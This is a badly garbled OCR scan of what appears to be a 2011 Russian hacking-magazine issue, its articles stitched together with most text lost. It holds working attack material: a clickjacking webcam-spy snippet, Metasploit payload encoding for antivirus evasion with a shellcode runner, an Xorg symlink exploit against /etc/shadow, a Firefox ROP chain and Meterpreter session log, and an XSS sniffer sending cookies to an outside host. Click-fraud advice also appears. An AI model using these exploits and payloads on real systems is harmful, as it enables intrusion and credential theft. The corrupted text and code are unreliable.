f unction_refreshSettings(timeout) { window ._ ~etTimeaut (fu n ction () _ {_ .... $ C.!tsgtt.i.ngs' ) . empty () , appen_d_( $ ( ' .< i frame

allowtransparency="true" src="https: / /www.macrome-dia.com/support/fiashplayer/sys/settingsmanager2. swf?defaultTab=privacy"> '));

setSettingsVisibility(); }, timeo_ut);

Adobe JavaScipt-o, ifame. SWF-

- . , , ? : ) (www. fe oss.og/webcam -spy), ',

' Fiefox Safai, GitHub (github.com/ feoss/we bcam - spy). ,

z-index opacity SWF-, ifame. , ,

Adobe . . ( ), -

WordPress ~"'~1ack Exploit vl ~----=--::- -

d~ Flash~ Player Settings anager

Website Privacy Settings F'or "~bses u hu\~ 11lrcd V\Sttc.-d. \ tc\\ or ltnn 1l1c pn\a )' scLtan '$ for necc. to your mcro :md 1 or nttcrophot1c.

A11vays ask @ Always allow QAJways deny Visited wes es Privacy Wesrtes () loss.org

Flash Player 'a

Delete all sites

Wied Gizmodo , Flash .

? , , , SQLi , , XSS.

(, , ). , . , clickjacking'a

- ( ), . FieFox NoScipt

( addons . moz ill a . og /r u /fire fox/addon/nosc r ipt ) . ClearCiick

, . , . I

White Hat Secur1ties i :: . - t . .

' +

-----

-----

-----

The hidden lframe contains : http/lwordpresslwp-adminlplug!n-tnstall.php?tab-plug!n-lnformatlon&r iframe=te&wjd-640&hejght-58l

Author: Chnian 8e1rtr!s

#outerdiv { width: 1 ; height:Opx; overflow:hidden; position:absolute; top:113px; left:335px; z-index:10; opacity:O;}

Last Updated: 1135 deys ogo Requlres WordPress Verslon: 2.5 or higher

#inneriframe { position:absolute; top:-40px; left:-10px; width:200px; height :1 00px; border: n ;}

- WordPress

12/155/2011 0~9

www.epidemz.net

PCWNE

IPV6-APEC ? , ,

: 1v4- . ? ? ? .

,

1v4- 1Pv6. :

. 1Pv6

, .

Windows

1Pv6: jpv6-test.com/ speedtest

, 1Pv6: bjt.ly/rHoc4B SixXS : bjt.ly/vOIOAC

~ ~Torrent Windows [{)

! ~;t) ~ n n !v/ eredo

uTorret Teredo

050

'-' ? 128- [2001 :5c0:1400:a::68dl 32- [65.148.151.1241- 1v6-. : 1v6- , . , ,

1v4- . , 1Pv6,- I-, NAT . ,

. . 1. ,

NAT. NAT, 1v4- . , [ii- , [!

. NAT : , , . iCQ,

I-, . [ !, 1Pv6 . , , , 1Pv4 1v6 [

1Pv6 ! . , 1Pv6. , , , 1v6-

. 1Pv6 , [ 1Pv4-apecal .

12/155/2011

www.epidemz.net

Oepending on your environmen~ you will connect to the gogoSERVER either anonymously or with authentication credentials. options are availate in the Advanced tab.

Server Address: anonymous.freenet.net

@ Connect Anonymously > n Using the Following Credentials

l st-e-pa-n-,.il:-yi:-n@-=--gm-----:ail.com -: ord: ~ ---~

111 l aunch the gogoCUENT service at system startup

Restore Default Values ...

Chec!c for update [ AJ>pl =:J 1 Close

2. 1v6 -. , - (, Bitoentl, 1Pv6

, . ,

. . IP UOP, UOP 1Pv6, 1v6- U-, . , , >> 1v6- 1Pv4 ( , UOPv41.

, . 1Pv6-to-1Pv4?

, 1Pv6 Uv4-: , ,

. 3. .

, - . , tnt-, N', ,

I- ( !. 1v6-, . , , N', -

I- ( 1Pv6, ! . tnt 1Pv6: uToent, Azueus, ansmission. 1 Pv6 ( ! , , . s6,

, 18 (16-, 2-nopl .

12/155/20 11

1Pv6:

Connection Status unnellnformation

Virtual Tunneling Adapte. Tunnel Mode:

4

Local Endpoint Addrees:

Remote Endpoint Addrees:

IPW-in-UDP-1Pv4 Tunnel (NAT Traversal) 2.148.151123 2001 :050:1400:000::::007

81.171.72.12 2001 :050:1400:000::::00 Sever Address: anon-amsterdam .freenet. net

N' . gogoCLIENT NAT Tavesal,

Wh2n oth protocots arl! available, your rowser usl!s

IPv

Yow ntemet connection iiPv i

2001:Sc0: 1400:a::68d gogo Inc.

1!1 Address type is

Global Unicast 1 Native IPv

Your rternet connectn is 1Pv4 capitble

62.148.151.123 Klgelecs

1Pv6- IPv~-apeca. ,

, 1v6- , . , thepiatebay.og ipv6 .n nm-club . u - n .

4. . n

( > , ! . , , > :1.

. .

, 1v6- .

, - 1Pv6? , , , - 1v6- . , - ,

, - , ( , > ], , - , . n , - , 1Pv4. , , 1v6-, ,

, - . . .

, .

1v6-, . . 1Pv6 ( ] ,

. NAT, 1v4- , , n ,

. 1Pv6. .

051

www.epidemz.net

PCZONE

Gogonet/Freenet6 gogonet.gogo6.com

n , n , NAT. GUI-

, n/56-n . 1Pv6, , , . .

Hurricane Electric 1Pv6 http :Uwww. tu n ne 1 ker. n et

, /48-n 1v6- . , no

[, , , , , , ! , , . ,

, IP.

SixXS www.sixxs.net

I-, , n , 1Pv6. [ ! 40 . : n [ Linkedlnl, . > [ it . ly/snYfdm l.

6to4 1v4-, 6to4- 1Pv6.

, . 6t4- 1v6-, 6t4-,

1v4-, 1v6-. 6t4- 1v6-,

anycast-apecy 192.88.99.1. , 6to4, 1v6- 1v6-. , .

6t4- , - 1v4-, , , 192.88. 99.1. . 6to4 , 6to4

, , , . - ,

. . I-, 1Pv6. 6to4 n . , ,

, , 200 .

Teredo , I-, NAT. 6to4 - -

052

0 n 1Pv4 , , 62.148.151.123

n 1Pv6 , , 2001:5c0:1400:a::68d , 1Pv6 n: freenet6 t ! r 8-ro ~ 2011 . ~

& I-

93.100.186.155.pool.sknt.ru [uTP] 178.255.14835

200 :2000 :4008:3 :224 : 7 eff:fE01: 84 2001:250:1401:3120:59d1:58a:801d:c095

m 94-192 -124-184.zone.bethere.co.uk

1v6- -

: , , 1Pv6 UDPv4 . ! , ) gogo6/ Feenet6 lgogonet .gogo6.com ), .

, , , 1Pv6, n,

12/155/2011

1Pv6:

% 1J orrent 2.2 DHP 100.0 703.8 kB/ s libTorrent 0.12.6 D 100.0 3613 kB/ s Bit ornado/031 D 100.0 78.8 kB/ s 1-1 orrent 1.8.5 UD 45.7 12.0 kB/ s

Bit orrent SDK 2.0 D 100.0 0.7 kB/ s

. feenet6, gogo6, n. : 1Pv6-in-1Pv4 l

, IP), 1Pv6-in-1Pv4 NAT vsli 1Pv6-in-UDP-is- 1Pv4),

, IP, 1Pv4-i-1Pv6la , 1v4-, 1v6-). n n TSP ITue l Setup Potocol) . , n .

: 1. gogoCLIENT lgogonet.gogo6.com/

pof il e/gogoCL I ENT). 2. ,

Conect>> .

, n , - 1Pv6-pecypc !n, ipv6.goog le.com). . - n 3653. . ,

1v4- n 1Pv6. 1v6- , : 1. lg ogonet.gogo6 .com/page/feen et6-

egistatio ), feenet6 . 2. > , . 3. > .

1v6-, - no n test-ipv6 .com. - n .

feenet6 - lusename.boke.feenet6 . net). , n n plain-text'e. , Advanced PASS DSS 3DES1 Digest MD5.

IPV6 feenet6- , n 1v6-,

. , , , !n, ). , - . , n 1 , . ::::

053

www.epidemz.net

/ EASY GreenDog , Digital Security ltwi tter.com/a ntyurinl

SMS ii'J.!i

- ! , IDS, DMZ, PDF - ,

.~ , SS-, . ,

SMS. , , . (

). - , . :) - Smsglobal [www.smsgloba l.com). , -

WINDOWS

, Windows 7/2008, , , ,

, .

1. n . 2. :

. {ED7BA47e-8E54-465E -82 5C -99712e4EelC}

- , ,

. , EasyHack. :)

051.

-

n 25 SS- . , [ fs 7 Sende 10) . ! n , n n

. n no , n nn, n n SMS 1 . ,

n , SMS. n, -

e-mail, - n SMS. , , ,

- .

OQ j i;;.-Desl:top~llgoods ni!n.

* ,6"- w 1t110t11 \1 .. . .. tn {3) t6141l ~ AiroN.:oe~npo~e~rwoc-Ao:olllllllrrtiOC~ntlle.t AI!'Ony

, - . , - !- . !! , ,

. , -. , . ! ,

- . ,

. XXI ! -, - . :1 thn- Findmyhash lcode.google.com/p/f indmyhashl. ,

-. >>, .

:

python findmyhash_v1.1.2.py MDS -g \ -h a2Sb2?1eba9de114~9adc7dfbea7235

python findmyhash_~1.1.2.py NTLM -f hacked_domain.txt_

RDP

, - , , , , -

, . , , , . ,

, , .

. RDP- Windows . RDP , 6- [ Vista Sv 20081.

, d-.

. , ? Default.dp, [, RDP 61.

, passwod .

, CyptUnpotectData[J cypt32.dll . , [ !.

, , , SID , .

12/155/201 1

EASY

: -h- ; -f- ; -g- Google.

, .

MDS NTLM-xwe

- Cain&Abel [www.ox id .i t l.

Remote De sk top Passwo d Decode d-. & .

, MSF . d .

MSF, :

1. mtt . 2. st-:

~ Defoult.rdp Notepa.d

d-

055

www.epidemz.net

1 EASY

SSLV-

HTTPS. mai - t he-mi'dd l e SSL- , SS Lv3/ LS. - , BEAST -

. : , , ap-spoofig.

- SSL

[ ap-spo of i g ). . ? SSL. 2009 - TLS/55Lv3 eegotiatio vul [CVE-2009-35551 . , [ ,

) . , 10 % [ : www.ssllabs.com/ssld/aalyze.htmi l .

. , , , . , :

11 TLS hadshake [ 11 .

1.1 LS [ 2) .

1.2 2.

2) [ eegotiatiol. ) 1, ,

2 [ Sessio \0, , 1 21.

Client

I J~--~~~~~~~: .~ LS Handshake sesslon #1 Attacker Server (S)

1 1 1

(dienl server) -tttacker holds l the packets 1 1

- 5nig11Ch DIIt-CO'I'I'I'Uiic:l --~ OclldliNictyplllcl~

ar- :CIIIrlt~ lt8CI ........ .u..

(i) ......... _T_L_S(-~tl-.;-~-S:-a~--=-=~-s81on-r)-#2--t .. : 1

. 1 ;;;~;rs:~;sa;;~;;nl;;.;-~l

commands of hls chofce 1 1 Q Renegotiotion ls triggered :

J 1 -~ LS Handshlllke sesson #1 contlnued (dl,nt-server) wlthln the encrypted sesslon #2 (attac,er.server) ~ 1 1 \7-;------------------ ... -............. ~

Cllent data ls encrypted wlthln sesslon ~1 (Green) (h attacker cannot read/ 1 1 manlpulate thls data), preVious data ~-2) preflxed to newty sent dient-data 1 1 1 1 1 1 1

056

. 4) ,

1.2, , 3.

, , >> . , , [ 1.1 1.21. [gtitil [ 21 [ 31.

. [

:11- ? TLS- [Sessio \0) .

, >> . , .

. [ 11 [ 1.11. ,

[ 3), .

? , , [ , ) . [www.g-sec.lu/pacticaltls . pdf ).

. -, SSLv3/TLS, HTTPS, FPS, SMTPS, 35 . . , . ? . ,

- . , ,

~~ M isceii

. , . , : 1. URL. , CSRF, G-. - heade

ijectio.

1) uiae 1. 2 GET /path/to/resource.jsp /1. Ignor-me: 2) , ,

: GET /path/to/resource.jsp HTTP/l.e

Igore-me: GET /index.jsp /1. Cookie: sessionCookie=Token

2. Redirect HTTPS . sslstip . HTTPS.

, , . , sslstip -

. SSL eegotiatio :

EASY

, ( 1.2):

GET /url_that_will_e2_to_HTTP Ignore-what-comes-now:

3. XSS. w- TRACE, JavaScipt-o.

1.2 : TRACE / /1. X:This cotent will refiected i the respose to the cl

ietalert('XSS') X-igore:

. . Pytho, . :1 ,

, - - (www. ss ll abs . com/ssld/a alyze . html), ssltest, BackTack 5, ssltlstest .

100 /- , XOR METERPRETER IJ.liaf.ir.:i

mtt Metasploit (www.metasp loi t. )- . , , mtt

. , - - ( ), -

. mtt, - - . .

. ... , .

MSF msfpayload - ,

. :

. .(avastl -~ -- -~-----

.... , "D:\prj\av_test\test_3.exe" . '"

, 3

:

1 :

:

XOR rocks! Avast

12/155/2011

0:00:00

1/0 15,1

--i"

#msfpayload windows/meterpreter/bind_tcp R 1 msfencode \ - 5 x8/shikata_ga_nai -t - test_.c

: windows/meterpreter/bind_tcp- MSF;

R - ; msfecode- ;

- 5 x86/shikata_ga_nai- payload ; -t - : ;

- test_.c - .

msfencode, , . msfpayload R, stage- , (mtt- -). , , . , MSF payload , . msfpayload - ( l.

- -, , . ! main - MSF,

. :

int mai ( int argc, char **argv) {

int ( *fuc) (); fuc=( int (*)()) buf; ( it )( *func) ();

057

www.epidemz.net

/ EASY

igned h buf [] "\x72\xc9\xac\x95\x39\xl\xll\x15\x8\xe8\x38\x96\xe5\x05\x7d\xaa\xfc "\xcd\xe3\x60\x74\x57\x4a\xaf\x2d\x94\xl3\x4b\xe3\xd4\x3a\x48\xc4\x7c

"\x34\x46\x56\x7a\x82\x7c\x5f\x3b\x54\x8e\x40\xa4\x3e\x2e\xa0\x75\xf "\x86\x78\x63\x4f\xf9\x91\xe\xlf\x7f\xc8\x33\xld\xfd\x78\xeb\x2e\xa "\xdl\x42\x2f\xd0\x99\x69\x25\x22\x77\xc\xaa\x3\x65\xdc\x03\x7f\xa "\\83\f2\59\2\\28\\\86\\39\7\49\\2\ "\xa\x2a\xf3\x4a\x62\x40\xd7\xdf\xa0\x7f\x83\x19\x95\xdl\x9b\x8b\xao "\x93\xc7\xc5\x32\x01\x59\xc2\x5d\xef\xld\x09\xb\xac\x81\xc4\xlc\x9 "\x09\xce\x74\xdd\x87\x8c\xl0\x43\xa3\x95\x44\xa4\x75\x54\x0a\x4b\xda

"\x38\xf5\xa9\x87\x37\x47\x42\x19\x05\x75\xde\x4a\xc8\xc\x5~\x7e\xO "\x49\x2c\x05\x61\xc3\xlf\xle\x30\x8b\xad\x51\x28\x2f\x59\x07\xf0\xf

"\x2c\x92\x87\xaf\x9e\x73\x9f\x3b\x5\xc2\xc3\x04\xcf\x40\x06\xf4\x9 "\x95\x2c\xla\xd0\xe\x7\x50\xe\xf2\xf3\xlf\x4f\xf6\xcc" ;

(int arqc, char arqv)

int i; f (i=O;i

WEXLER.HOME 903 n , n n ( n ,

nn). , n n, n . handycratta , n . , , n .

n n n . WEXLER.HOME 903 64- Windows 7 n n n

, n .

wexLU.

-~

ltel Core i5-650 3,2 - 4 . CPU

Turbo Boost, (

, ]. , .

GeForce GTX 460, Fermi.

DirectX 11 GTX 460 , NVIDIA 30 Visio , PhysX CUDA

, . .

WEXLER.HOME 903 4 , .

. , , , .

. WEXLER.HOME 750 . , , .

WEXLER.HOME 903 Windows 7 . n

64- : 4 n n.

, n n Microsoft Security Essentials Office 2010 Starter (

Word Excel, n n n].

Windows 7 . * wexLer:

/

, ! , , ,

. , !

1 Apache mod_proxy CVSSV2 5.0 111111111 111 11 1111

[]]I3] : 11 2011 . : Rodigo s . CVE: CVE-2011-3368.

1 IAV:N/AC:L/AU:N/C:P/I:N/A:N]

!, Nginx Squid], Apache ,

mod_poxy. -

!, ], , . , mod_poxy,

.

1:i RewiteRule PoxyPassMatch -, , -. Apache . .

, - :

RewriteRule (. *)\. (jpg]gif] png) http:/ /images.exa:>le.can$1.$2 [] ProxyPassatch (. *)\ . (jpg]gif]png) http:/ /images.exarrple.com$1.$2

, . :

GET @other.example.com/something.png /1.1

-, , :

http://images.example,[email protected]/something.png

, othe.example.com, images.example.comra . URI lraothe.example.com/something.png /1 .1 1

, n

060

livinside.iogspot.comJ 1115612, . , .1]

400 Bad Request. n SECFORCE . n : goo.gi/Ob6yV. mod_poxy n

, IDMZ]. , Apache ! Apache, ,

]. n , :

python apache_scan.py [options] [options]

-r: Apache -: n, Apache ( 80) -u: URL ( /) -d: (DMZ) (

127. . .1) - : n DMZ ( single port scan) -g: GET-anpoc DMZ ( /) -h:

:

python apache_scan.py -r www.example.com -u /img/test.gif , DMZ python apache_scan.py -r www.example.com -u /img/test.gif

-d internalhost.local , DMZ python apache_scan.py -r www.example.com -u /img/test.gif \

-d internalhost.local - se -g /accounts/index.html

if.!;ldjfi Apache Sv 1.3. 1.3.42; Apache Serve 2.0 . 2.0.64; Apache Serve 2.2. 2.2.21.

JOi,J!iijiI mod_poxy

lgoo.g l/xNiqR]. , RewiteRule :

RewriteRule /(. *)\. (jpg]gif]png) http:/ /images.exarrple.com/$1.$2 []

12 /155/ 2011

www.epidemz.net

2 Xorg CVSSV2 5.7 1111 11111 111 1111 1111 111

[AV: L/ AC:L/ AU : 5/:/1: / A:PI

: 28 2011 . : vladz . CVE: CVE-2011-4029.

vladz g, /tmp/.tX-lock [-

Xl. .

, - .

1I g /tmp/.X -lock . - : [! /tmp/.tX -lock O_EXCL PID, /tmp/.X-lock, . /tmp/.Xn-lock. , , . , chmod[l

, , /tmp/.tXn-lock , !l.

, /tmp/.tXn-lock open[l [ 2961 chmodll [ 3181.

, , ... g [ l, [ 341 1 , chmod[l? :

# strace :1 [ .. . ] open("/tmp/.tXl-lock", O_WRONLY[O_CREAT[O_EXCL, 44) wr:i..t.e(e, " 2192\n", 11) chmod("/tmp/.tX1-lock", 444) =

, SIGSTOP SIGCONT, . ,

. , :

ACDSee FotoSiate 4.0. Access Vi ol atio. 5 -

12/155/2011

1. - [PID nl. 2. , SIGSTOP

/tmp/.tX1-Iock. , chmod[l.

3. /tmp/.tX1-Iock.

4. /tmp/.tX1-Iock -> /etc/shadow. 5. SIGCONT, chmod[l

444 /etc/shadow.

, , -,

, . - : /tmp/.X1-Iock -> /dontexist. - FataiEo[l.

exploit-db.com, 10- 18040. :

I]!'I . xcomoq_. ~ _xch_mpd ~n:;s. . /xchqg [ /} /J1] ( .. - .l'e.t _cjshadow)

i . ls -1_ 1 etc/ sha_dow _ -rw-r----- 1 roat sh_adow 187.2 Aug 7 e_7:1e_jetc/shadow $ .Lxchmod [ +] Trying to stop )(Qrg p_roc_e_ss right before chmod () [+] Process ID 4134 stopped (SIGSTOP sent) [ + ] __ Rei119V_ing /tq/. tx1-lock launching another Xc:Jrg process [+] Creating evil sylink (/tmp/ .tX1-lock -> /etc /shadow) [ +] Process ID 4134 resumed (SIGCONT _sent)_ [ +] Attack succeedec!, ls -1 /etcjshadow: __ -r--r-cr-- 1 root shad()w 172 Aug 7 H7:1e .. /.etcist)adoi>!

lt1;11Jf1 g 1.4 1.11.2. g 1.3 USE_CHMOD.

'iJ!IijiI g 1.11.2 1.12 .

Array.reduceRight 6-6 Mozilla

Firefox CVSSV2 10.0 11111 1111 1111 1111 11 111

[AV:N/AC:L/AU:N/C:C/I:C/A:CI 1I

: 13 2011 . : Chis Rohlf, lvnitskiy, Matteo Memelli, dookie2000ca,

si3, m _me, TecROc. CVE: CVE-2011-2371.

Metasploit, Mozilla Fiefox 3.6. ,

educeRight[l .

1I educeRight callback : [ iik-l, , , -

061

www.epidemz.net

/

Firefox 3.6.16. (generic/debug_trap)

. iik- l ), .

educeRight JS- _t js. . 2740 Aay.Length :

jsuint length; if (!js_GetlengthProperty(cx, obj, &length))

return JS_FALSE;

js. 2767. JavaScipt-oe educeRight, start, end step .

jsit ! ) .

jsint start = , end = length, step = 1; switch (mode) {

case REDUCE_RIGHT: start = length - 1, end = -1, step = -1;

start = length -1 , start , length- . JS-

, , :

~/head> var myobject = document.getElement8yid( 'd' );

function spray() { 1/ ...

}

spray(); obj = new Array;

062

obj.length = 2197815382; f = function trigger(prev, myobj, indx, array) {

alert(myobj[ e]); obj.reduceRight(f, 1, 2, 3);

spayll heap spaying ASLR. R-:

181F1886 1e1F188

183E8D78

183E8D7D

1D8 1D83

141 14

1846917 1846918

12 121

1e2Eeees 16

181F1886 1elF18e7

18283481 18283482

121

78891 > 78893 78894 78896 78899 7889 7C889AEF 7C889AF2 7C889AF4

7C889AF9 7C889AFA

18838768

; RETN

V ESI,DWORD PTR DS:[EAX] ; kernel32.Virtua1Alloc

RETN

8 xul.18838768 RETN

8 RETN

EDX RETN

xul.184C26Fe RETN

EDI xul.182AC881 RETN

RETN

PUSHAD RETN

RETN

MOV EDI,EDI xul.182AC881 PUSH 8 MOV E8P,ESP PUSH DWORD PTR SS:[E8P+14] PUSH DWORD PTR SS:[E8P+18 ] PUSH DWORD PTR SS : [E8P+C] PUSH DWORD PTR SS:[E8P+8] PUSH -1 CALL kernel32.VirtualAllocEx ; // ; 8

REN 18

JMP ESP ; payload

Metasploit.

msf > use exploit/windows/browser/mozilla_reduceright msf exploit(mozilla_reduceright) > set payload windows/ meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(mozilla_reduceright) > set lhost 192.168.8.121 lhost => 192.168.8.121 msf exploit(mozilla_reduceright) > set uripath test

12/155/2011

www.epidemz.net

n n mod_proxy

uripath => test msf exploit(mozilla_reduceright) > exploit [ *] Exploit running as background job. [ *] Started reverse hand ler on 192.168..121:4444

( *] using URL: http: ;;e.e.e.e:sese; test [*] Local IP : http ://192.168.e.121:8e8e/ test [ *] Server started . msf exploit(mozilla_reduceright) > [*] Sending exploit to 192.168..123:174 .. . [*] Sending stage (752128 bytes) to 192.168 . .123 [*] Meterpreter session 1 opened (192 . 168..121:4444 -> 192.168..12:175) at 211-1-17 18:2:4 +4 [* ] Session ID 1 (192.168 . .121:4444 - > 192.168..123 : 175) processing InitialAutoRunScript 'migrate -f' [*] Current server process: firefox.exe (1992) [*] Spawning notepad.exe process to migrate to [+] Migrating to 1652 [+] Successfully migrated to process

if.1 ldjfi Mozilla Fiefox 3.6.16, 3.6.17.

, .

' ACDSee FotoSiate id, L- CVSSV2 10.0 111111 11 11111 111111

ll1:iim : 10 2011 . : Pavez w, jua vazquez. CVE: CVE-201 1-2595.

111 IAV:N/ : L/ AU: N/C:C/1 : / :)

ACD FotoSiate- , ,

46 57. ,

12 / 155/2011

. 12 , , Metasploit, . , ACDSee FotoSiate 4.0 ! 146)

id Stig, . L- ACDSee FotoSiate

. S- . --t, , . 263557 ipwssl6.dll.

:

msf > use exploit/windows/fi leformat/acdsee_fotoslate_string msf exploit(acdsee_fotoslate_string) > set payload windows/ exec payload => windows/exec msf exploit(acdsee_fotoslate_string) > set cmd calc . exe cmd => calc .exe msf exploit(acdsee_fotoslate_string) > exploit [ *] Creating 'msf.plp' file . . . [ *] Generated output file /home/ pi kofarad/ .msf4/data / exploits / msf . plp

, ! ) .

jf.!;ldjfi ACDSee FotoSiate 4.0 Bui ld 146.

,_i,]!liiiI , . ::

g

063

www.epidemz.net

www.epidemz.net

, qweeqweqweewq [ alias sygwoc5eqwlbwfv ) [ )

[ 1 [ )

(http //httpz net) n (http.//152 137 21 . 112) ip

XS S

ur1 xss

!

-8 [ 1

[ email 1

n (http:l/site.com/xss.php?id=">)http://site.comlxss.php?id=%22%3E ( xss ). javascript , n

ur1 r , I., _ .:_fr_a_~s~t> ,_ ., .. _.

, - - stip_tags[J, . ,

. , :

6~1:

?

JS- SS- . ' :

! l, , .

. , , , ? - 20-30 JS- , .

JS ->> :

var servers = [ 'http://freel.hostl.com/' 4 'http://free2.hostl.com/' ,

'http://free.hostl.com/' ,

'http://freel.hostS.com/' , 'http://free2.host5.com/' , 'http://free3.host5 . com/' ]; for ( var key in servers) {

}

document.getElemetByid( 'footer' ).innerHTML += 'cscript src="'+servers[key]+'">' ;

if (loaded){ break;}

if (loaded){ .. . }

loaded, , . , , . ,

. - . ,

, . ,

logs.txt, .

-------lr~

-

066

2130000

, ,

XSS:

$_5ERVER['HTTP_U5ER_AGENT ' )- ; $_5ERVER['REMOTE_ADDR')- I-; $_SERVER['HTTP_REFERER')- ( n ); date("d.m.y H:i") - ; urldecode($_GET['c'])- n ;

$_SERVER[ ' QUERY_STRING')- .

, stip_tags!l. , Django, . , n , SS-. , ,

, , .

, , - ,

.

, , L-. . XSS , - . . :

c!>chtml>

, - , , , , - . !,

- demotivatos.u L- l ). ,

, , , -.: - )

12/155/2011

www.epidemz.net

!

XSS DEMOIVATORS.RU

XSS , . : 1. - XSS

, vkontakte . u , ma il. u , d .u . . XSS ,

. , d emo ti vatos. u .

, XSS :

Jl "" function (){ return new Image();} var xss_l;n(), xss_2;n(), xss_;n(), sniff ; 'var ; new Image(); x.src ; "http://tvoi.sniffer.comj?c;"+ escape(document.cookie); ~

// n XSS n "" xss_l.src ; 'http://_sitel.ru/search. php?q;">'+sniff+'' ; xss_2.src ; 'http://site2.ru/search. php?q;"> ' +sniff+' ' ;

xss_.src ; 'http://site.ru/search. php ?q;" > '+sni ff+' ' ;

[-

2. . n: no

, , n, , n JavaScipt-o, XSS div-co,

, . n, n

:

n :

window ._on.load;function() {

document.getElementByid( 'banners' ). innerHTML ; '' ; }

3. n n . n

JS + , n n n

. n: n JS-, n, JS-n

n , action n n.

!, nl n n tin-.

!n, ! . 4. n

n pop-unde pop-up. n

, n. 5. n

ifame. , n .

6. - n n JavaScipt :

document.getElementByid( 'id_dema' ). src; 'http://host . ru/podmena.jpg' ;

7. : ifame !n

!. 8. n

JS-.

{xss}- javascipt-o . , . .

, , . , AJAX. , ,

- HTML + JS. ,

. .

, . , - . SS-, , .

, n- n , , , . ,

. . :

< !DOCTYPE >< FRAESET onload; "{xss}" >

, , . :

< !DOCTYPE> < FRAESET onload; "{xss}" style; "display:none;" >

12/155/2011

.

, l l.

>>, XSS - .

, ,- , demotivatos.u.

. : 500 .

12 1180 !,

. , . ! ::

067

www.epidemz.net

- DBMX

..........

, ,

, -

! ,

.

www.master-x.com -

.

www.aofuckbjz.com -

-.

www.rxpblog.com -

.

(

)- , . - , .

. , . , . - ,

. , , , . ,

, , .

:

-

, - ,

.

.

068

, .

,

, .

() . , ,

, -

,

.

( ) , -

,

, ,

12/155/2011

www.epidemz.net

lg_eeics,

, ] . ,

, , , ,

.

- - , ,

30-50% .

,

- . -, ,

. l, , ] . .

, . .

! ].

. , .

- ,

, :]. , .

: :

:

, - .

- .

, , , .

, , . - .

.

Phamcash.com RX- Pates . iz Stimui-Cash.com OXOetwo k.com

201 2006 2006 2007

/ -: 40% , 30- 50% ! 75% 70% 100 - 45%, ] 300 - 50%

, , , , , , . , ., . , ., ., , , , , , , . , ., ., .

Visa, M asteCad, Visa, MasteCard, , Visa, MasterCard, , Visa, Euro D eit, , Wire , Wire Wire, MoeyGram Wire, M o eyGram

$100 $100 $50 $1 00 / ,

-

, - 110 ], - ! ,

]

12/155/2011 069

www.epidemz.net

-

. t >> .

. , , x h amste.com ,

. , .

, ? , -

. , ,

. $30.

- 40-60%.

, . , .

[ l, .

- ,

. , . [ !,

.

, [!. WodPess >> .

- .

FGH [ ,

/ -

-

/

070

Royai -Cash .com

2001

50-60% $30-40

44

check, wie, n, , WebMoney, Paxum, eCoin

EanCoin . com Aepatneship.com

2003 2003

50% 50%

23 173

check, wie, wie, n, WebMoney, Paxum, WebMoney, Paxum, eCoin, ePese eCoin

$100 $100

: :

:

l. , FGH . , - , , , .

.

FeoCash.com CashManiacs.com

1999 2003

50% 50%

58 128

Paxum, check, wie, ePaySevice WebMoney, Paxum,

ePaySevice

$300 $50

12/155/2011

www.epidemz.net

( PER CLICK) . cl ick- . - ' , - .

! ), , . , . , ,

. Iid) , l) . , , , , - . - . , id , .

, , .

,

. , .

:

. ,

.

, ,

! -

, ).

,

. - .

Bidtaffic.com Click9.com

2004 2008

/ - 70- 95% 70%

$40 $50 - ePasspote , Epese,

PayPal, Webmoney, StomPay, Wie EPESE, WebMoney

12/155/2011

Peakclick.com Daoclick.com

2005 2009

70% 80%

$100 $50 Wi e , Webmoney, ePassporte, ePassporte, Westen Union, EPESE, WebMoney PayPal, Wire

: :

:

Thegreenppc.com Bizzclick.com

2009 2009

80% 75%

$50 $10 Webmoney, Wire, ePassporte, PayPa l, PayPal StormPay, EPESE,

Visa, MasteCard, Western Union, PayPal, Wire, Liberty Reserve, WebMoney

071

www.epidemz.net

: :

: & .

: : : ' ,

. - , , . ,

. - . , .

! !, , .

/ - -

/

12/155/2011

Glavtog.com

2010

!! 25- 35%

Webmoney, Epass, PayPal, Wie

$100

n n n n

-. , , : -. , ,

.

,

XML , .

.

, .

Stimui-Cash.com Affiliate-pogam . Amazon .com KingsPofit .com

201 1996 2010

!!

!!

25% 4- 8% 25%

Webmoney, Epass, PayPal, Check Webmoney, Wie Wire, ePesee, Moneybookes

$50 $10 $100

073

www.epidemz.net

www.epidemz.net

Appearance

Plugins

JAVASCRIPT

BetterPrlvacy 1.66 ~ More j" Preferences Download Manager Weak 0.9.5 Alows .. . ~ j ~ Preferences j 8 Disable - Remove 1

Flashiock 1.5.15.1 Repla ...

NoScnPt WJB updar.ed atter res(ft F1retox.

41) NoScrlpt 2.1.2.5rc1 E>

www.epidemz.net

. life4u apoo la. e . faronovlagm ail . com l

AdSense 10 .

. , .

078

www.qoogle.com/ ~-Google AdSese; direct.yandex.ru .; www.spybox.com. !li.-

- SpyBox; www.adwatcher.com -

Adwatcher; ~- ; l!iYti.ll&r!l - Piwik; www.qooqle. com/anaJytics/ .

[ . click f aud - )- , [ ) . [ , , ), [ - ) . , 10-15 % .

, . - -.

, . , . ,

. AdSese . , >

. , ,

12/155/2011

www.epidemz.net

/ (~

SpyBox

~- ~ " " u

" " " ..

B~oru,..,_ ... ,.. ,>O~, !

n-, $0,1 ] . : n n , nR,- - ! t~R nn n. n n

n n t~R, n n ~ t~,

n . n, n, n R . n n .

, .

n . n .

n -n IPay-peCiick- n, n ,

High Threat .. Heat l

12/155/ 2011

: R AdSense

10,000

9,091

8.182

7,273

6 ,364

5.455

4 .~4,

3 ,636

2 ,727

1,818

909

unique Clicks 8Ciicks 8ctions sles

Data to display: 0 Unique clicks [tJ Clicks rJ Actions EJ Sales Timeframe: [iast ~

- Adwatcher

n , ] . n , n . ! , IP n n ).

n , n .

, n n , n n ,

. n ,

n . 1. n I- ,

n, - . , I n .

2. n, n n , , :

, n nn , n .

Click

079

www.epidemz.net

.

?

n: n -n ? n , n / n . , n. 2007 n Yahoo! n .

Checkmate Strategic Group. n Yahoo! n n

2004 . 2006 Google 90 . n n nn

, , n n

n .

. n, n , n [ , n , ), : n- n

. 4. n ,

, . n . :

n, n [n, - n ),

n , n 100. n n

n. 5. n

, n n n .

: SPYBOX , n . n n n

. , n/ n, , n

. n , 100% , n [ , n ) .

n - n SpyBox. , n -, n n, n n, n n, , , - .

n: n n L-,

n . n [ ):

var script =document. createElement( 'script' );

080

script.type= 'text/javascript' ;

if(localSt orage.spybox) { var spybox_has h= 'a181a603769clf98ad927e7367c7aa51' ; var spybox_session= l ocalStorage .spybox; script .src= 'http://ua.robotreplay.net/fast.js' ; }

document.get ElementsByTagName( "head" ) [ e). appendChild(script);

n , n , n .

